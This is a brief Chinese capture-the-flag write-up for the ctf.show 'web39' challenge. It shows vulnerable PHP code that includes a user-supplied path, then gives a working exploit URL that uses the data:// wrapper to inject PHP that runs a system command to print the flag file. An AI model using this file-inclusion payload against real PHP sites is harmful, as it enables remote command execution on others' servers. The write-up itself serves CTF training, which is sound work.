跳到主要内容

web39

error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag/i", $c)){
include($c.".php");
}

}else{
highlight_file(__FILE__);
}

include的后缀,不影响直接传入带system的payload

https://1de3a2ef-ca0c-486d-bc7d-14bb5f5dcf01.challenge.ctf.show/?c=data://text/plain,<?php system("tac f*"); ?>

img